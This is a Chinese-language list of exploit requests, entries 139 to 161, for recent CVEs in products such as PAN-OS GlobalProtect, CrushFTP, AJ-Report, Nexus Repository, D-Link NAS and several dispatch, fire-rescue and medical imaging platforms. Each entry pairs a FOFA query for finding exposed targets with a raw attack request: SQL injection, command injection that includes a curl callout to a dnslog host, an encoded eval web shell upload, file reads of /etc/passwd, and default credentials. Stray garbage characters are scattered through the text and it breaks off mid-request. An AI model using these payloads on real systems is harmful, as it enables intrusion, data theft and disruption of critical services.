Connection: close- ]2 j k7 N7 D
Upgrade-Insecure-Requests: 11 \$ O7 I- H0 [7 u p2 C$ r# Z
; E1 n3 f. x+ q% f8 n( w, G$ Y. B* H
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
0 [/ A3 x/ x3 M1 C; \CVE-2024-2622
4 |4 C# f. x1 c1 yFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% C6 i2 D$ c! u
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.18 p% j" h& c5 Y
Host: x.x.x.x: Q9 J' H( H" w: J E% b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% l8 o3 h+ c w3 y. i- F) K9 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& I* E! M, G. P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 B( O4 \: ?' x' uAccept-Encoding: gzip, deflate, br
, D9 i- T* x; I. |' O4 {( v7 K- CConnection: close
2 X$ | R/ B9 g9 e6 ?% fCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
0 O7 C! ?- Z1 \% QUpgrade-Insecure-Requests: 1
6 n1 D. M# p) _3 D6 S! d. M8 Z% A
8 k8 K, z9 V5 H2 q8 A& j, S140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
0 r0 y% a/ |$ p9 MCVE-2024-2566
$ F2 J4 y! _6 |; f* F% B( ZFOFA:body="app/structure/departments.php" || app="指挥调度管理平台") G% o* i: G! a. ~! D8 Y" F
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ U X" n" [* l! P c1 vHost: x.x.x.x4 Q: }3 s4 e8 h8 B7 i6 }+ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% H; b" _) e( [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 X5 g5 r+ y& B2 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 _! D) e9 P8 i6 y- c: R" mAccept-Encoding: gzip, deflate, br
: {9 y3 J! O2 G F9 a3 FConnection: close8 k3 ~! n- y/ R
Cookie: authcode=h8g94 Y4 T9 [1 O6 R# }# W0 ^/ v
Upgrade-Insecure-Requests: 1
& J! c; n- v' P
/ u1 U+ y9 Y# ^: u% h' j" t* ]8 A( v8 T) j4 P1 N3 h! ~
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入+ p9 V3 }3 l: I
FOFA:body="指挥调度管理平台"
. s% J. x% e" S8 z/ a: pPOST /app/ext/ajax_users.php HTTP/1.1% M1 f$ G O! S- F9 J6 u+ V5 J W
Host: your-ip
3 ?6 g' U9 ?! IUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info0 |6 i. x9 }/ j6 m# t8 S0 r
Content-Type: application/x-www-form-urlencoded
3 @7 L8 `! R( X! L- J
! }3 v. G Z* \3 W6 u. @, p: B: |: h
- _: v: `; S" P* Cdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
9 w" D) D) W5 \! f/ ]; j% x& \0 s3 ^3 S# I
% z% z4 R) o" {142. CMSV6车辆监控平台系统中存在弱密码- S+ T2 X- l. Q* C. [! P
CVE-2024-296666 {$ U; u- _. H0 ]2 l/ P
FOFA:body="/808gps/" h D( R# u1 t/ ^
admin/admin
* X3 u4 _, y/ j; i1 [143. Netis WF2780 v2.1.40144 远程命令执行
+ p! `+ t/ [2 e1 |+ B" cCVE-2024-25850: w% Z; n t5 _6 V
FOFA:title='AP setup' && header='netis'8 ?4 g" D+ ^2 ], n
PAYLOAD6 k" T7 |7 x3 f* {% i- `
3 q7 f. ^7 r0 B144. D-Link nas_sharing.cgi 命令注入
2 b) P/ ~; U/ T) ~) |/ a0 NFOFA:app="D_Link-DNS-ShareCenter"+ o$ I' c, F# u5 U h8 }- f! L
system参数用于传要执行的命令9 Q8 d5 b/ i _! E& d9 g% s0 H4 R
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
7 T4 T; D) G i; l9 sHost: x.x.x.x
0 Y4 _9 [3 C! m! \8 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0( {% K5 j7 y R! @7 Z; G
Connection: close4 \) w: n3 B5 j* Z- |, u
Accept: */*$ D- r- ?+ \) W) I: v
Accept-Language: en
- h' p: U5 g1 L' K+ |Accept-Encoding: gzip. Q6 ^9 P5 R9 R/ m. s1 F, j$ m) P
7 l$ v4 }) `; i: C2 P3 y* m5 E. `" o( u8 y' ^
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
# H2 w7 _: X k& \& J4 k" bCVE-2024-3400% y1 v& J6 I, l J' @
FOFA:icon_hash="-631559155"9 ]+ J* O0 |- r- s5 X3 I
GET /global-protect/login.esp HTTP/1.1
$ M- e! B9 h8 @; P; l( iHost: 192.168.30.112:1005& u" X0 t) d. K% ^; y! o3 s: r9 X, f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. d7 ] _5 P/ h* V" C0 o- }% u# e
Connection: close
1 q( l& j% u% U' J5 D1 ~/ X/ ?% p3 }Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;; P m1 I7 \" h$ q
Accept-Encoding: gzip
* E+ G% X: _2 U9 o: K& h T
) Q: ]# `9 F, M# p, k1 ?; d$ r
/ N4 X4 L# l; C. L7 U8 _. N6 ?6 q146. MajorDoMo thumb.php 未授权远程代码执行+ c1 p r$ ^4 {$ O/ z
CNVD-2024-02175
5 @3 E1 Z+ }. J8 f2 WFOFA:app="MajordomoSL"8 {* E+ J5 @( a
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.10 B7 g% x, [3 S6 k/ f3 o
Host: x.x.x.x: n! J8 ]4 u2 C! Z- W" f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 g0 j, G( K2 Q- T! P: DAccept-Charset: utf-87 A, S. A; T! X$ f% C, n2 g
Accept-Encoding: gzip, deflate: y5 U1 \# D9 F% p# @) G! q$ [5 O1 c
Connection: close
+ m( @. H2 O; |& I* W* {& o% o5 S0 L h C4 Y
+ R+ P/ a1 L, T" U/ p7 J D147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ e6 r: J3 `) Q- W; f8 xCVE-2024-32399
- l, I+ b) G- L* KFOFA:body="RaidenMAILD"6 | f+ t O1 J/ W2 C2 m# c( J
GET /webeditor/../../../windows/win.ini HTTP/1.1: {( i+ ^0 s" |; c! Z
Host: 127.0.0.1:817 b1 ^2 V; t+ _3 ^
Cache-Control: max-age=0( k+ y7 i( ~' r
Connection: close
! g8 p6 J" Q9 F9 X# P8 d8 x& \( O7 g7 h m9 F
! Z$ m a0 J5 M2 a0 U" d9 m9 x; y
148. CrushFTP 认证绕过模板注入
; C7 I" x0 q/ F1 kCVE-2024-4040
6 C$ L7 Q- e' p! U2 M+ @' SFOFA:body="CrushFTP"
2 v8 D) O- p6 p/ J' `+ ]PAYLOAD* T. S4 k0 s) z3 [* t. e+ T* O8 D
8 I3 S! ]3 I [* T8 K2 ?" b$ G9 k149. AJ-Report开源数据大屏存在远程命令执行+ M/ v; i/ A- `. \" c
FOFA:title="AJ-Report"/ A9 n/ p; U0 R' W$ C
2 p6 l m2 ~$ P7 m4 [/ O
POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 ?9 I) s* e C# x2 v
Host: x.x.x.x9 D; y* r# o; O4 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& R( p1 L1 R' \3 H( P- b( }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- S$ G' I4 X }
Accept-Encoding: gzip, deflate, br. V: M# ?7 C+ L4 u L
Accept-Language: zh-CN,zh;q=0.9
# Z, a* l7 v* h5 y" `Content-Type: application/json;charset=UTF-8+ M5 [: ?' L+ ^/ H% B1 {) D
Connection: close
8 q; L, {5 j `9 i/ I; b* |# c8 F* P" m* X+ I
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 k% v2 M) M2 O8 G
3 u% @+ K) g) |/ _9 @2 I d
150. AJ-Report 1.4.0 认证绕过与远程代码执行$ G) w- _/ `. e/ k% t
FOFA:title="AJ-Report"
- q1 V* ?' T: z, O& P% |POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& |% F2 K; O9 U# L/ a- |Host: x.x.x.x
' O; v2 S2 k# L4 E* H; G" h$ Y- |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" F# N2 ?& w7 [. O( V. G/ YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 m0 c; s" m! D8 [9 k1 RAccept-Encoding: gzip, deflate, br% u( w$ \/ {$ @, g
Accept-Language: zh-CN,zh;q=0.9% ^# {# R S6 @% c3 C
Content-Type: application/json;charset=UTF-8
, O: S o: H" d( m( aConnection: close
" w' n. s! o3 zContent-Length: 339
7 L" o. a2 P" |/ F: i4 v- ]5 E% k3 a6 ~0 v8 e: y
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; b/ ]6 M' W! o& \+ e
0 A% o& V+ f2 }& L. X( _! E
5 p$ O, n, }& ^2 h5 L
151. AJ-Report 1.4.1 pageList sql注入
+ U5 l I2 \) V3 q5 jFOFA:title="AJ-Report". Y# |& K. l( W
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
1 \* I. H- v' k2 g: k5 Z; c$ bHost: x.x.x.x+ E0 E9 |5 O( N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, U- U& O# K, E0 g3 w9 D
Connection: close( o4 k6 N" Z* ?5 n' l0 I. g' S% b
Accept-Encoding: gzip% L" L0 O( ]+ ]1 N: r' I
" T! V$ \; U) f" {: T9 z" m* [& a/ j( ~9 K/ I$ r- X" B
152. Progress Kemp LoadMaster 远程命令执行
( {: U1 s% {: T) d( ^CVE-2024-1212* r% M# Y. o5 A1 }1 R
LoadMaster <= 7.2.59.2 (GA)8 H' q8 L2 B8 C
LoadMaster<=7.2.54.8 (LTSF)
2 P" j4 q3 Q. _* VLoadMaster <= 7.2.48.10 (LTS)
, _9 @6 g8 z& g& ]) cFOFA:body="LoadMaster"
- [; J6 |3 I& k% cJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码5 y8 b# A, @; g9 e0 t k5 ~* t
GET /access/set?param=enableapi&value=1 HTTP/1.1; F C+ [6 q5 p7 t* ]
Host: x.x.x.x/ E/ D7 s9 W) i( m% G! {9 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1$ I8 G! f( D. {$ Z' p) r
Connection: close
' t! \; o f0 {Accept: */*
* J( u/ h9 m- j( y- l- PAccept-Language: en
; o7 H v4 K" y" }) k! j: ~: xAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=3 r8 u5 T# Z4 {% ~5 x; c) ~
Accept-Encoding: gzip
. |+ [ X" F F/ J4 o! c/ X6 `$ f8 J2 [
& M+ H3 x/ e7 k- k s, M# j2 H
153. gradio任意文件读取
& r: X# K" E5 ^( C! oCVE-2024-1561FOFA:body="__gradio_mode__"
! E5 ~8 s3 [( n8 |7 Q" m( s; v1 k第一步,请求/config文件获取componets的id2 H+ Z7 s' `4 n0 A
http://x.x.x.x/config
- f I; O- C) M4 D" ?) B8 c$ f, ]
: @" U" ~* A. Z& ~$ }; G4 \2 O: P3 l& ] E& H; e$ Q1 s
第二步,将/etc/passwd的内容写入到一个临时文件
& A, ]5 \" T6 V- P4 X+ I4 V; }POST /component_server HTTP/1.1% b! t+ l6 y4 U
Host: x.x.x.x& _$ B! B: X& d9 V4 k& z' t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' ~% F. e9 ~( z i: K( w% o+ y" HConnection: close8 }6 [ G, T3 O5 P! E
Content-Length: 1154 ~$ K1 J- D/ X: ?# L2 J* m: s
Content-Type: application/json
# z1 ]7 J+ p. p6 `1 D" E5 U% oAccept-Encoding: gzip
* f+ f5 }" K/ }1 ]4 y: Y# |
" W* r# Q9 r ^3 W: A{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}9 K( ?0 C R) {4 c) l
. _1 J5 X4 p2 a# ]+ A1 L. }, r, S/ C9 {, ~
第三步访问
# C8 F2 A! S6 U8 |1 p: ghttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd6 d' h3 k% D. t( v# k
5 \$ |. H/ S! e/ Q, N" j& N
8 i9 G# |2 w: s0 z154. 天维尔消防救援作战调度平台 SQL注入, y) x, V% p( b$ l$ Y8 ~6 c, k4 d
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"' m, l7 t1 Q) _) \; W" }
POST /twms-service-mfs/mfsNotice/page HTTP/1.15 C- t, \! A# N! q* q0 ?( \ S) o9 p2 S
Host: x.x.x.x2 q2 k" W- z2 p( I3 n
Content-Length: 106, R% X' {4 R& @% p2 @
Cache-Control: max-age=00 h. z1 u) U; ^% E$ E
Upgrade-Insecure-Requests: 1
6 K( b# y3 E p: m8 f; o/ iOrigin: http://x.x.x.x& g% e5 z4 n; s7 @
Content-Type: application/json
" Z. R# Y/ j% \& }% `; q) ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
' p/ N% ]0 Z5 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& g) n: X( X! m6 _Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page, d6 ~; Z1 d" b$ I1 d% X. {
Accept-Encoding: gzip, deflate) V9 b5 h" [; A, s& W/ ^4 i8 K
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7: @! G) ?) }$ q1 p, i& f" D
Connection: close
* M5 D S) |: y3 I! t: {' A, U j/ ^7 n- r4 L! g2 O9 e; Z
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
# `0 @' d4 V7 O0 _: V8 S D7 s6 R6 o/ {% Z2 V1 o; T
2 B- \: @# Z. Y% y# J+ c155. 六零导航页 file.php 任意文件上传
3 F2 b2 [$ }2 q5 n7 L9 o" wCVE-2024-34982: _/ N. O7 c' L3 y7 \ a2 L
FOFA:title=="上网导航 - LyLme Spage"
7 N$ `" [9 Q0 H, y# k" ?# f+ OPOST /include/file.php HTTP/1.14 Z2 c) d- F& o/ j" }
Host: x.x.x.x
( b. I; U& a! ~2 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
* ]) _* u# I# VConnection: close
7 o0 Y- t) ]3 Q: I& pContent-Length: 232
# @6 y8 E7 l2 Y' z& T9 pAccept: application/json, text/javascript, */*; q=0.01
7 h% W: h7 w" Y9 B/ m$ |Accept-Encoding: gzip, deflate, br' E7 b$ A* M/ j: c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 B$ K* I. e1 E* I2 Q& O
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
1 \6 d# P$ @3 `X-Requested-With: XMLHttpRequest* [( w1 Z% g" ], l
/ @4 _9 q4 m7 I; a j7 c; C y$ [0 C-----------------------------qttl7vemrsold314zg0f
1 I4 y% i( i' x& a6 q, PContent-Disposition: form-data; name="file"; filename="test.php"8 j% l; f" X- a9 P! d7 Q0 A
Content-Type: image/png
5 g* _# F$ Z2 g: K& l1 B: b/ O! p6 ^! T% J, {+ X: e! T o
<?php phpinfo();unlink(__FILE__);?>8 A& a- ~7 w2 x5 K- b9 D
-----------------------------qttl7vemrsold314zg0f--
3 u/ _) W: b# y, ]) [: U6 D7 d
( l7 [9 T9 u7 k; ?, D- g, q) r- f. I" R/ W& R
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php$ w. D$ I; T/ n; K% l5 N. z
+ k3 s: `2 p& T' U) I. K
156. TBK DVR-4104/DVR-4216 操作系统命令注入& a' h, m" Q0 ?+ V7 k
CVE-2024-3721, C) U( y& z& d( j7 b' b: v2 \
FOFA:"Location: /login.rsp"
* f- s( h; N3 @: `' o7 @7 M·TBK DVR-4104* O% m% R& B: L" L! ^2 O, G$ q
·TBK DVR-42165 n1 R3 r* A( e$ c5 ~
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# G" U7 F4 _ w$ L* E5 ~' `7 K; J0 s" O: v% _8 `
6 e D' E$ P& i4 S2 Z, F
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
$ }8 C4 O+ c z; @Host: x.x.x.x
0 z5 e9 I6 I# Y/ x/ Z( OUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) J, s$ r) l4 n; [5 _: v% m6 {* F& y
Connection: close! D- M* g d: O/ X' U2 }
Content-Length: 08 `( N( ]; n. l2 e7 M
Cookie: uid=1
( a2 K# H* y* l- m2 g5 _& kAccept-Encoding: gzip
& M0 X% R4 K3 N: i P) Q; Q
1 M6 [$ f: |( y) L( o: M
( k8 R! [) d) M* O157. 美特CRM upload.jsp 任意文件上传/ H: h3 I; c1 F
CNVD-2023-06971" `* t: [. }. L4 u; w
FOFA:body="/common/scripts/basic.js"
8 i" J2 h/ C3 [: k4 g$ ~8 W: WPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.16 G3 o5 a0 W3 Q3 N% T
Host: x.x.x.x
8 r, N2 G/ t# E5 M8 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, Y" `2 x. D) D$ E& R }. c3 Y; X, cContent-Length: 709
/ B/ w! ~, b2 a U; g7 G; MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 N2 b- g" k: J* |3 K0 HAccept-Encoding: gzip, deflate
% e& ]; ]- \. M! ^5 n) L. F0 wAccept-Language: zh-CN,zh;q=0.9# ?- G. I7 s' u# _" }) h3 Z
Cache-Control: max-age=0
( v1 R/ y, q* x2 N) X; q. tConnection: close
) @6 U K8 z- x0 {" MContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN" O) g B5 e M' j5 U: Y
Upgrade-Insecure-Requests: 1% y2 Q: W- X, J4 O5 Q; ~
$ @: G( ^3 P2 F6 ?9 p
------WebKitFormBoundary1imovELzPsfzp5dN
: V1 m3 ]6 d) z: d+ fContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp", F0 |, U; }$ U) j
Content-Type: application/octet-stream
+ ~. X8 |# N' _
; \! Q. H. W; Snyhelxrutzwhrsvsrafb
; b- i3 C! q B& J# E/ V7 n1 ?" Y------WebKitFormBoundary1imovELzPsfzp5dN
) T+ l& ^! v2 p9 C `$ \% MContent-Disposition: form-data; name="key"
' |8 C! E; V: Q9 N2 Z& P, P( |1 I1 [: M' Z0 }/ P, d
null
& o P8 X4 e% Q% z# `$ u. `7 C' J------WebKitFormBoundary1imovELzPsfzp5dN
& c! D- j( p9 W4 H' u* I% yContent-Disposition: form-data; name="form"
/ t2 B0 s. q: n8 t0 K
+ Z+ c8 \# Z) Jnull w) Z* ^9 h5 A" d- ^$ H8 \
------WebKitFormBoundary1imovELzPsfzp5dN. P: b& U. H- z4 [- E2 E# ^ b6 D# t+ G
Content-Disposition: form-data; name="field"* C7 ?* F5 q; }7 H5 p# i
! i [) E7 W( u& L3 D6 _# tnull
4 J+ s1 z+ U- V; l) g- q# ~/ ?& k------WebKitFormBoundary1imovELzPsfzp5dN" v5 _; j. p+ S+ A
Content-Disposition: form-data; name="filetitile"
2 e4 j4 R w7 x) A1 d( {7 {' L% S7 M' c1 a: t
null: e I# A w. w, d" X M
------WebKitFormBoundary1imovELzPsfzp5dN
s/ p8 Y+ `& b. \: JContent-Disposition: form-data; name="filefolder"9 ]5 n! _+ L+ [) o5 r2 a
9 a3 C( q- \4 B7 @: @' J
null
2 k1 G* z, b& W9 g------WebKitFormBoundary1imovELzPsfzp5dN--8 U" T% a4 k6 D, r4 N) w0 @( t
l: V% y" L9 k+ H, C3 ]- |5 D% C* g: ~3 t
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp4 f* h% J: k3 u+ e( x
* b2 K, q' N$ w, O
158. Mura-CMS-processAsyncObject存在SQL注入
5 t4 K" l# u) o6 N8 D) QCVE-2024-32640
9 o A' k( @$ e; E6 P$ n1 W7 kFOFA:"Generator: Masa CMS"
6 T8 J; Y7 s3 J/ i! L2 jPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 f( x# V2 t) _ b) `Host: {{Hostname}}
9 _- L _ j! i8 ^ L6 {Content-Type: application/x-www-form-urlencoded8 X" z3 A6 m- G8 `
% |: m' p( }2 S1 V" _4 iobject=displayregion&contenthistid=x\'&previewid=1
0 w4 s' Y& o d/ A6 u, P) E( e! H% }7 B0 E4 j
* K" S( s2 | f159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传! f! l7 i( ]$ \( C9 s- F
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
# r8 K3 \' F! q& ?; S) v% KPOST /webservices/WebJobUpload.asmx HTTP/1.1
: J m9 @0 l' O3 n) H& ?/ FHost: x.x.x.x6 F' \0 v4 v+ N9 f2 O8 d. X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; H. G7 X2 |: r( A
Content-Length: 1080( o' c/ U3 |" O* v
Accept-Encoding: gzip, deflate: m: Y! |% o, x: R/ n& {
Connection: close
) i1 C8 q# b1 L' uContent-Type: text/xml; charset=utf-8
8 p8 W/ z6 L9 T( }Soapaction: "http://rainier/jobUpload"1 c4 v5 L7 k& g" t1 y- h
' D2 L6 i' m+ l
<?xml version="1.0" encoding="utf-8"?>
; v) L4 u/ n8 A, p1 s1 @, Z9 G<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" b8 ~0 K, t8 C& o V3 X! A/ q
<soap:Body>
4 l; [# Q3 _; r: L5 l2 b( s<jobUpload xmlns="http://rainier">+ Q# Q1 \/ f* V7 I0 g8 s
<vcode>1</vcode>
! i( ~1 d/ q j: I' d<subFolder></subFolder>. v, ?; @% o2 o
<fileName>abcrce.asmx</fileName>
# H8 T' a$ b! d+ i+ |/ {9 f3 y) M<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
3 i0 K4 Z- _* O* L</jobUpload>
" `* a: P8 L' y( m( L* j</soap:Body>
1 ~! y: [% n$ W+ D/ y8 _</soap:Envelope>& O# b7 h4 b% ], N; C
" B" c5 A9 r& x/ J% I6 v' b, m/ |* x `! s2 V5 Z( G
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
$ x+ J8 w: l7 v* G9 g) ~) N1 u
. ~3 y0 T2 @$ `1 p# h
* a4 z5 c9 K& N& C% H( _% T160. Sonatype Nexus Repository 3目录遍历与文件读取
1 a5 e) b* v; V/ p. r" vCVE-2024-4956% @% V0 Q O" r! w' y5 M& l8 }8 {
FOFA:title="Nexus Repository Manager"
+ c9 z0 p" Y) a1 B. g- |GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.11 C# X0 g9 J( ~! |( R
Host: x.x.x.x
$ ]2 H ^ h/ }# R. S2 KUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0& f- _7 e6 K ^! W5 I) D
Connection: close
* p+ ~2 a; Y* P$ E7 Z' jAccept: */*7 O+ k, L) V; X0 R
Accept-Language: en
2 F5 Z6 O4 K" a* h, WAccept-Encoding: gzip" h$ i" s# D3 Z3 A7 d
: A# O& {. k* ` e% {/ S
5 }' s/ ?/ I4 C161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
; ]" T, m6 o* jFOFA:body="/KT_Css/qd_defaul.css"3 U9 H! i5 F# r0 X
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
: T6 p( w- U7 [% _5 ~/ c' n M0 kPOST /Webservice.asmx HTTP/1.1
/ d; Q- R! e J5 N% OHost: x.x.x.x6 m; B2 g# [2 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
& ]" b1 O, A2 A) fConnection: close
# c4 Y( q2 O: @& k1 H& E7 x$ C- MContent-Length: 445% k/ e4 o, @* Y' K/ L. g6 o
Content-Type: text/xml
' I, k. S. [4 b1 m& r9 u& I# w- eAccept-Encoding: gzip1 `1 y5 c5 W- @
! }( K0 Q5 Z) p7 D* _
<?xml version="1.0" encoding="utf-8"?>
/ V6 F9 x, q3 A% i& W<soap:Envelope xmlns:xsi="
% x X; t1 T. _http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
